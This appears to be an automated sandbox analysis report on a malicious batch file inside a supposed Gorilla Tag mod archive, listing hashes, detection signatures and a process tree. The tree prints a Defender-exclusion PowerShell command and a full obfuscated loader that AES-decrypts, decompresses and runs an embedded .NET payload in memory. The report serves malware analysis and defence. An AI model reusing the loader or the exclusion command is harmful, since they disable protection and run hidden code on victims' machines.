Overview

Task         Sample                 Platform            Score
static       (all submitted files)  -                   10
behavioral   Project-LS...in.zip    windows7-x64        1
behavioral   Project-LS...in.zip    windows10-2004-x64  1
behavioral   Project-LS...ICENSE    windows7-x64        3
behavioral   Project-LS...ICENSE    windows10-2004-x64  1
behavioral   Project-LS...SD.zip    windows7-x64        1
behavioral   Project-LS...SD.zip    windows10-2004-x64  1
behavioral   LSD.bat                windows7-x64        1
behavioral   LSD.bat                windows10-2004-x64  8
behavioral   Project-LS...DME.md    windows7-x64        10
behavioral   Project-LS...DME.md    windows10-2004-x64  3
Analysis (score 3)
- max time kernel: 119s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 25/08/2024, 17:21
Tasks
- static1: static task
- behavioral1: Project-LSD-Gorilla-Tag-main.zip on win7-20240708-en
- behavioral2: Project-LSD-Gorilla-Tag-main.zip on win10v2004-20240802-en
- behavioral3: Project-LSD-Gorilla-Tag-main/LICENSE on win7-20240704-en
- behavioral4: Project-LSD-Gorilla-Tag-main/LICENSE on win10v2004-20240802-en
- behavioral5: Project-LSD-Gorilla-Tag-main/LSD.zip on win7-20240705-en
- behavioral6: Project-LSD-Gorilla-Tag-main/LSD.zip on win10v2004-20240802-en
- behavioral7: LSD.bat on win7-20240705-en
- behavioral8: LSD.bat on win10v2004-20240802-en
- behavioral9: Project-LSD-Gorilla-Tag-main/README.md on win7-20240708-en
- behavioral10: Project-LSD-Gorilla-Tag-main/README.md on win10v2004-20240802-en
General
- Target: LSD.bat
- Size: 1.3MB
- MD5: a9550f1c944a4bce9df986467e8c8065
- SHA1: da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3
- SHA256: b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529
- SHA512: fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca
- SSDEEP: 24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z
Malware Config
(none extracted)

Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  PID 2772 powershell.exe
- Deletes itself (1 IoC)
  PID 2976 cmd.exe
- Executes dropped EXE (1 IoC)
  PID 2544 LSD.bat.exe
- Loads dropped DLL (1 IoC)
  PID 2976 cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 2772 powershell.exe; PID 2544 LSD.bat.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 2772 powershell.exe
  Token: SeDebugPrivilege, PID 2544 LSD.bat.exe
- Suspicious use of WriteProcessMemory (18 IoCs; each entry below was reported three times)
  PID 2976 cmd.exe wrote to memory of 3052 (target process 31)
  PID 3052 net.exe wrote to memory of 2184 (target process 32)
  PID 2976 cmd.exe wrote to memory of 2668 (target process 33)
  PID 2976 cmd.exe wrote to memory of 2760 (target process 34)
  PID 2976 cmd.exe wrote to memory of 2772 (target process 35)
  PID 2976 cmd.exe wrote to memory of 2544 (target process 36)
Processes

- C:\Windows\system32\cmd.exe (PID 2976, depth 1)
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"
  signatures: Deletes itself; Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3052, depth 2)
    command line: net file
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2184, depth 3)
      command line: C:\Windows\system32\net1 file
  - C:\Windows\system32\cmd.exe (PID 2668, depth 2)
    command line: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
  - C:\Windows\system32\findstr.exe (PID 2760, depth 2)
    command line: findstr /C:"" blacklist.txt
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2772, depth 2)
    command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"
    signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe (PID 2544, depth 2)
    command line: "LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d